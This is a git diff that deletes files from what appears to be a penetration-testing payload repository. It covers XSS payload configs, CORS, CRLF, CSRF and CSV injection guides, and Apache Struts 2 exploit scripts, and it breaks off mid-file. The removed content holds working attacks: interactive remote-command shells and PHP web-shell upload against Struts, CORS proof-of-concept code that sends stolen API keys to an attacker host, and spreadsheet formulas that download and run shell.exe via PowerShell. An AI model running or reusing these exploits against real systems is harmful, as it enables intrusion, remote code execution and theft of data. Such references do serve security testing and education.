diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml deleted file mode 100644 index dc61942..0000000 --- a/.github/FUNDING.yml +++ /dev/null @@ -1,4 +0,0 @@ -# These are supported funding model platforms -github: swisskyrepo -ko_fi: swissky -custom: https://www.buymeacoffee.com/swissky \ No newline at end of file diff --git a/.github/banner.png b/.github/banner.png deleted file mode 100644 index a01328a..0000000 Binary files a/.github/banner.png and /dev/null differ diff --git a/.github/hopla_config.json b/.github/hopla_config.json deleted file mode 100644 index 7de4b8c..0000000 --- a/.github/hopla_config.json +++ /dev/null @@ -1,2527 +0,0 @@ -{ - "categories": [ - { - "name": "XSS", - "values": [ - { - "name": "Fingerprint", - "value": "\"'>

Toto" - }, - { - "name": "Debugger", - "value": "" - }, - { - "name": "Simple", - "value": "" - }, - { - "name": "Classical", - "value": "\">" - }, - { - "name": "IMG", - "value": "" - }, - { - "name": "SVG", - "value": "" - }, - { - "name": "Polyglot 1", - "value": "javascript:/*-->" - }, - { - "name": "Polyglot 2", - "value": "javascript:`//\"//\"//<svg/onload='/*-->`" - }, - { - "name": "WAF Bypass", - "value": "';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//" - }, - { - "name": "XSS in JS Context", - "value": ";alert(1);//" - }, - { - "name": "CSP Bypass", - "value": " -

CORS PoC

-
- -
- - - -``` - -### Vulnerable Example: Null Origin - -#### Vulnerable Implementation - -It's possible that the server does not reflect the complete `Origin` header but -that the `null` origin is allowed. This would look like this in the server's -response: - -``` -GET /endpoint HTTP/1.1 -Host: victim.example.com -Origin: null -Cookie: sessionid=... - -HTTP/1.1 200 OK -Access-Control-Allow-Origin: null -Access-Control-Allow-Credentials: true - -{"[private API key]"} -``` - -#### Proof of concept - -This can be exploited by putting the attack code into an iframe using the data -URI scheme. If the data URI scheme is used, the browser will use the `null` -origin in the request: - -```html - -``` - -### Vulnerable Example: XSS on Trusted Origin - -If the application does implement a strict whitelist of allowed origins, the -exploit codes from above do not work. But if you have an XSS on a trusted -origin, you can inject the exploit coded from above in order to exploit CORS -again. - -``` -https://trusted-origin.example.com/?xss= -``` - -### Vulnerable Example: Wildcard Origin `*` without Credentials - -If the server responds with a wildcard origin `*`, **the browser does never send -the cookies**. However, if the server does not require authentication, it's still -possible to access the data on the server. This can happen on internal servers -that are not accessible from the Internet. The attacker's website can then -pivot into the internal network and access the server's data without authentication. - -```powershell -* is the only wildcard origin -https://*.example.com is not valid -``` - -#### Vulnerable Implementation - -```powershell -GET /endpoint HTTP/1.1 -Host: api.internal.example.com -Origin: https://evil.com - -HTTP/1.1 200 OK -Access-Control-Allow-Origin: * - -{"[private API key]"} -``` - -#### Proof of concept - -```js -var req = new XMLHttpRequest(); -req.onload = reqListener; -req.open('get','https://api.internal.example.com/endpoint',true); -req.send(); - -function reqListener() { - location='//atttacker.net/log?key='+this.responseText; -}; -``` - -### Vulnerable Example: Expanding the Origin / Regex Issues -Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header. - -#### Vulnerable Implementation (Example 1) - -In this scenario any prefix inserted in front of `example.com` will be accepted by the server. - -``` -GET /endpoint HTTP/1.1 -Host: api.example.com -Origin: https://evilexample.com - -HTTP/1.1 200 OK -Access-Control-Allow-Origin: https://evilexample.com -Access-Control-Allow-Credentials: true - -{"[private API key]"} - -``` - -#### Proof of concept (Example 1) - -This PoC requires the respective JS script to be hosted at `evilexample.com` - -```js -var req = new XMLHttpRequest(); -req.onload = reqListener; -req.open('get','https://api.example.com/endpoint',true); -req.withCredentials = true; -req.send(); - -function reqListener() { - location='//atttacker.net/log?key='+this.responseText; -}; -``` - -#### Vulnerable Implementation (Example 2) - -In this scenario the server utilizes a regex where the dot was not escaped correctly. For instance, something like this: `^api.example.com$` instead of `^api\.example.com$`. Thus, the dot can be replaced with any letter to gain access from a third-party domain. - -``` -GET /endpoint HTTP/1.1 -Host: api.example.com -Origin: https://apiiexample.com - -HTTP/1.1 200 OK -Access-Control-Allow-Origin: https://apiiexample.com -Access-Control-Allow-Credentials: true - -{"[private API key]"} - -``` - -#### Proof of concept (Example 2) - -This PoC requires the respective JS script to be hosted at `apiiexample.com` - -```js -var req = new XMLHttpRequest(); -req.onload = reqListener; -req.open('get','https://api.example.com/endpoint',true); -req.withCredentials = true; -req.send(); - -function reqListener() { - location='//atttacker.net/log?key='+this.responseText; -}; -``` - -## Labs - -* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack) -* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) -* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack) -* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack) - -## Bug Bounty reports - -* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) -* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) -* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) -* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) -* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) - -## References - -* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) -* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) -* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) -* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) -* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors) -* [CORS Misconfigurations Explained - Detectify Blog](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md deleted file mode 100644 index 90405ca..0000000 --- a/CRLF Injection/README.md +++ /dev/null @@ -1,117 +0,0 @@ -# Carriage Return Line Feed - -> The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line. - -> A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. - -## Summary - -- [CRLF - Add a cookie](#crlf---add-a-cookie) -- [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass) -- [CRLF - Write HTML](#crlf---write-html) -- [CRLF - Filter Bypass](#crlf---filter-bypass) -- [References](#references) - -## CRLF - Add a cookie - -Requested page - -```http -http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue -``` - -HTTP Response - -```http -Connection: keep-alive -Content-Length: 178 -Content-Type: text/html -Date: Mon, 09 May 2016 14:47:29 GMT -Location: https://www.example.net/[INJECTION STARTS HERE] -Set-Cookie: mycookie=myvalue -X-Frame-Options: SAMEORIGIN -X-Sucuri-ID: 15016 -x-content-type-options: nosniff -x-xss-protection: 1; mode=block -``` - -## CRLF - Add a cookie - XSS Bypass - -Requested page - -```powershell -http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%0d%0a0%0d%0a/%2f%2e%2e -``` - -HTTP Response - -```http -HTTP/1.1 200 OK -Date: Tue, 20 Dec 2016 14:34:03 GMT -Content-Type: text/html; charset=utf-8 -Content-Length: 22907 -Connection: close -X-Frame-Options: SAMEORIGIN -Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT -ETag: "842fe-597b-54415a5c97a80" -Vary: Accept-Encoding -X-UA-Compatible: IE=edge -Server: NetDNA-cache/2.2 -Link: -0 -``` - -## CRLF - Write HTML - -Requested page - -```http -http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E -``` - -HTTP response - -```http -Set-Cookie:en -Content-Length: 0 - -HTTP/1.1 200 OK -Content-Type: text/html -Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT -Content-Length: 34 - -You have been Phished -``` - -## CRLF - Filter Bypass - -Using UTF-8 encoding - -```http -%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE -``` - -Remainder: - -* %E5%98%8A = %0A = \u560a -* %E5%98%8D = %0D = \u560d -* %E5%98%BE = %3E = \u563e (>) -* %E5%98%BC = %3C = \u563c (<) - -## Labs - -* [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) - -## Exploitation Tricks -* Try to search for parameters that lead to redirects and fuzz them -* Also test the mobile version of the website, sometimes it is different or uses a different backend - -## References - -* https://www.owasp.org/index.php/CRLF_Injection -* https://vulners.com/hackerone/H1:192749 diff --git a/CRLF Injection/crlfinjection.txt b/CRLF Injection/crlfinjection.txt deleted file mode 100644 index d7ef4d7..0000000 --- a/CRLF Injection/crlfinjection.txt +++ /dev/null @@ -1,17 +0,0 @@ -/%%0a0aSet-Cookie:crlf=injection -/%0aSet-Cookie:crlf=injection -/%0d%0aSet-Cookie:crlf=injection -/%0dSet-Cookie:crlf=injection -/%23%0aSet-Cookie:crlf=injection -/%23%0d%0aSet-Cookie:crlf=injection -/%23%0dSet-Cookie:crlf=injection -/%25%30%61Set-Cookie:crlf=injection -/%25%30aSet-Cookie:crlf=injection -/%250aSet-Cookie:crlf=injection -/%25250aSet-Cookie:crlf=injection -/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection -/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection -/%2F..%0d%0aSet-Cookie:crlf=injection -/%3f%0d%0aSet-Cookie:crlf=injection -/%3f%0dSet-Cookie:crlf=injection -/%u000aSet-Cookie:crlf=injection diff --git a/CSRF Injection/Images/CSRF-CheatSheet.png b/CSRF Injection/Images/CSRF-CheatSheet.png deleted file mode 100644 index b7efc6d..0000000 Binary files a/CSRF Injection/Images/CSRF-CheatSheet.png and /dev/null differ diff --git a/CSRF Injection/README.md b/CSRF Injection/README.md deleted file mode 100644 index a04796b..0000000 --- a/CSRF Injection/README.md +++ /dev/null @@ -1,190 +0,0 @@ -# Cross-Site Request Forgery - -> Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP - - -## Summary - -* [Methodology](#methodology) -* [Payloads](#payloads) - * [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction) - * [HTML GET - No User Interaction)](#html-get---no-user-interaction) - * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction) - * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction) - * [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction) - * [JSON GET - Simple Request](#json-get---simple-request) - * [JSON POST - Simple Request](#json-post---simple-request) - * [JSON POST - Complex Request](#json-post---complex-request) -* [Bypass referer header validation check](#bypass-referer-header-validation) - * [Basic payload](#basic-payload) - * [With question mark payload](#with-question-mark-payload) - * [With semicolon payload](#with-semicolon-payload) - * [With subdomain payload](#with-subdomain-payload) -* [References](#references) - -## Tools - -* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe) - -## Methodology - -![CSRF_cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/Images/CSRF-CheatSheet.png?raw=true) - -## Payloads - -When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it. - -### HTML GET - Requiring User Interaction - -```html -Click Me -``` - -### HTML GET - No User Interaction - -```html - -``` - -### HTML POST - Requiring User Interaction - -```html -
- - -
-``` - -### HTML POST - AutoSubmit - No User Interaction - -```html -
- - -
- - -``` - -### HTML POST - multipart/form-data with file upload - Requiring User Interaction - -```html - - -
- - -
- -``` - - -### JSON GET - Simple Request - -```html - -``` - -### JSON POST - Simple Request - -```html - -``` - -### JSON POST - Complex Request - -```html - -``` - -## Bypass referer header validation - -### Basic payload -``` -1) Open https://attacker.com/csrf.html -2) Referer header is .. - -Referer: https://attacker.com/csrf.html -``` -### With question mark(`?`) payload -``` -1) Open https://attacker.com/csrf.html?trusted.domain.com -2) Referer header is .. - -Referer: https://attacker.com/csrf.html?trusted.domain.com -``` - -### With semicolon(`;`) payload -``` -1) Open https://attacker.com/csrf.html;trusted.domain.com -2) Referer header is .. - -Referer: https://attacker.com/csrf.html;trusted.domain.com -``` - -### With subdomain payload -``` -1) Open https://trusted.domain.com.attacker.com/csrf.html -2) Referer headers is .. - -Referer: https://trusted.domain.com.attacker.com/csrf.html -``` - -## Labs - -* [CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses) -* [CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method) -* [CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present) -* [CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session) -* [CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie) -* [CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie) -* [CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present) -* [CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken) - - -## References - -- [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/) -- [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) -- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton](https://whitton.io/articles/messenger-site-wide-csrf/) -- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) -- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali](http://yasserali.com/hacking-paypal-accounts-with-one-click/) -- [Add tweet to collection CSRF - vijay kumar](https://hackerone.com/reports/100820) -- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) -- [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya_purani](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) -- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346) -- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) -- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/) -- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0) -- [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f) -- [Bypass referer check logic for CSRF](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/) diff --git a/CSV Injection/README.md b/CSV Injection/README.md deleted file mode 100644 index 75621d8..0000000 --- a/CSV Injection/README.md +++ /dev/null @@ -1,63 +0,0 @@ -# CSV Injection - -Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. - -## Exploit - -Basic exploit with Dynamic Data Exchange - -```powershell -# pop a calc -DDE ("cmd";"/C calc";"!A0")A0 -@SUM(1+1)*cmd|' /C calc'!A0 -=2+5+cmd|' /C calc'!A0 - -# pop a notepad -=cmd|' /C notepad'!'A1' - -# powershell download and execute -=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 - -# msf smb delivery with rundll32 -=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 - -# Prefix obfuscation and command chaining -=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A -=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A -+thespanishinquisition(cmd|'/c calc.exe'!A -= cmd|'/c calc.exe'!A - -# Using rundll32 instead of cmd -=rundll32|'URL.dll,OpenURL calc.exe'!A -=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A - -# Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. -= C m D | '/ c c al c . e x e ' ! A - -``` - -Technical Details of the above payload: - -- `cmd` is the name the server can respond to whenever a client is trying to access the server -- `/C` calc is the file name which in our case is the calc(i.e the calc.exe) -- `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data - -Any formula can be started with - -```powershell -= -+ -– -@ -``` - -## References - -* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection) -* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection) -* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) -* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) -* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) -* [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation) -* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection) - diff --git a/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py b/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py deleted file mode 100644 index bda451a..0000000 --- a/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py +++ /dev/null @@ -1,215 +0,0 @@ -#!/usr/bin/python - -from __future__ import print_function -from future import standard_library -standard_library.install_aliases() -from builtins import input -from builtins import str -import urllib.request, urllib.error, urllib.parse -import time -import sys -import os -import subprocess -import requests -import readline -import urllib.parse - -RED = '\033[1;31m' -BLUE = '\033[94m' -BOLD = '\033[1m' -GREEN = '\033[32m' -OTRO = '\033[36m' -YELLOW = '\033[33m' -ENDC = '\033[0m' - -def cls(): - os.system(['clear', 'cls'][os.name == 'nt']) -cls() - -logo = BLUE+''' - ___ _____ ___ _ _ _____ ___ - ( _`\(_ _)| _`\ ( ) ( )(_ _)( _`\ - | (_(_) | | | (_) )| | | | | | | (_(_) - `\__ \ | | | , / | | | | | | `\__ \ - ( )_) | | | | |\ \ | (_) | | | ( )_) | - `\____) (_) (_) (_)(_____) (_) `\____) - - =[ Command Execution v3]= - By @s1kr10s -'''+ENDC -print(logo) - -print(" * Ejemplo: http(s)://www.victima.com/files.login\n") -host = input(BOLD+" [+] HOST: "+ENDC) - -if len(host) > 0: - if host.find("https://") != -1 or host.find("http://") != -1: - - poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}" - - def exploit(comando): - exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" - return exploit - - def exploit2(comando): - exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}" - return exploit2 - - def exploit3(comando): - exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" - return exploit3 - - def pwnd(shellfile): - exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" - return exploitfile - - def validador(): - arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"] - return arr_lin_win - - #def reversepl(ip,port): - # print "perl" - - #def reversepy(ip,port): - # print "python" - - # CVE-2013-2251 --------------------------------------------------------------------------------- - try: - response = '' - response = urllib.request.urlopen(host+poc) - except: - print(RED+" Servidor no responde\n"+ENDC) - exit(0) - - print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC) - - if response.read().find("mamalo") != -1: - print(RED+" [-] VULNERABLE"+ENDC) - owned = open('vulnsite.txt', 'a') - owned.write(str(host)+'\n') - owned.close() - - opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) - #print BOLD+" * [SHELL REVERSA]"+ENDC - #print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC - if opcion == 's': - print(YELLOW+" [-] GET PROMPT...\n"+ENDC) - time.sleep(1) - print(BOLD+" * [UPLOAD SHELL]"+ENDC) - print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC) - - while 1: - separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC) - espacio = separador.split(' ') - comando = "','".join(espacio) - - if espacio[0] != 'reverse' and espacio[0] != 'pwnd': - shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'")) - print("\n"+shell.read()) - elif espacio[0] == 'pwnd': - pathsave=input("path EJ:/tmp/: ") - - if espacio[1] == 'php': - shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("")'""" - urllib.request.urlopen(host+pwnd(str(shellfile))) - shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'")) - if shell.read().find(pathsave+"status.php") != -1: - print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC) - else: - print(BOLD+RED+"\nNo Create File :/\n"+ENDC) - - # CVE-2017-5638 --------------------------------------------------------------------------------- - print(BLUE+" [-] NO VULNERABLE"+ENDC) - print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC) - x = 0 - while x < len(validador()): - valida = validador()[x] - - try: - req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))}) - result = urllib.request.urlopen(req).read() - - if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: - print(RED+" [-] VULNERABLE"+ENDC) - owned = open('vulnsite.txt', 'a') - owned.write(str(host)+'\n') - owned.close() - - opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) - if opcion == 's': - print(YELLOW+" [-] GET PROMPT...\n"+ENDC) - time.sleep(1) - - while 1: - try: - separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC) - req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))}) - result = urllib.request.urlopen(req).read() - print("\n"+result) - except: - exit(0) - else: - x = len(validador()) - else: - print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)) - except: - pass - x=x+1 - - # CVE-2018-11776 --------------------------------------------------------------------------------- - print(BLUE+" [-] NO VULNERABLE"+ENDC) - print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC) - x = 0 - while x < len(validador()): - #Filtramos la url solo dominio - url = host.replace('#', '%23') - url = host.replace(' ', '%20') - if ('://' not in url): - url = str("http://") + str(url) - scheme = urllib.parse.urlparse(url).scheme - site = scheme + '://' + urllib.parse.urlparse(url).netloc - - #Filtramos la url solo path - file_path = urllib.parse.urlparse(url).path - if (file_path == ''): - file_path = '/' - - valida = validador()[x] - try: - result = requests.get(site+"/"+exploit3(str(valida))+file_path).text - - if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: - print(RED+" [-] VULNERABLE"+ENDC) - owned = open('vulnsite.txt', 'a') - owned.write(str(host)+'\n') - owned.close() - - opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) - if opcion == 's': - print(YELLOW+" [-] GET PROMPT...\n"+ENDC) - time.sleep(1) - print(BOLD+" * [UPLOAD SHELL]"+ENDC) - print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC) - - while 1: - separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC) - espacio = separador.split(' ') - comando = "%20".join(espacio) - - shell = urllib.request.urlopen(host+exploit3(str(comando))) - print("\n"+shell.read()) - - else: - x = len(validador()) - exit(0) - else: - print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)) - except: - pass - x=x+1 - else: - print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC) - exit(0) -else: - print(RED+" Debe Ingresar una Url\n"+ENDC) - exit(0) diff --git a/CVE Exploits/Apache Struts 2 CVE-2017-9805.py b/CVE Exploits/Apache Struts 2 CVE-2017-9805.py deleted file mode 100644 index 4eb64f5..0000000 --- a/CVE Exploits/Apache Struts 2 CVE-2017-9805.py +++ /dev/null @@ -1,326 +0,0 @@ -#!/usr/bin/env python3 -# coding=utf-8 -# ***************************************************** -# struts-pwn: Apache Struts CVE-2017-9805 Exploit -# Author: -# Mazin Ahmed -# This code is based on: -# https://github.com/rapid7/metasploit-framework/pull/8924 -# https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/ -# ***************************************************** -from __future__ import print_function -from builtins import str -import argparse -import requests -import sys - -# Disable SSL warnings -try: - import requests.packages.urllib3 - requests.packages.urllib3.disable_warnings() -except Exception: - pass - -if len(sys.argv) <= 1: - print('[*] CVE: 2017-9805 - Apache Struts2 S2-052') - print('[*] Struts-PWN - @mazen160') - print('\n%s -h for 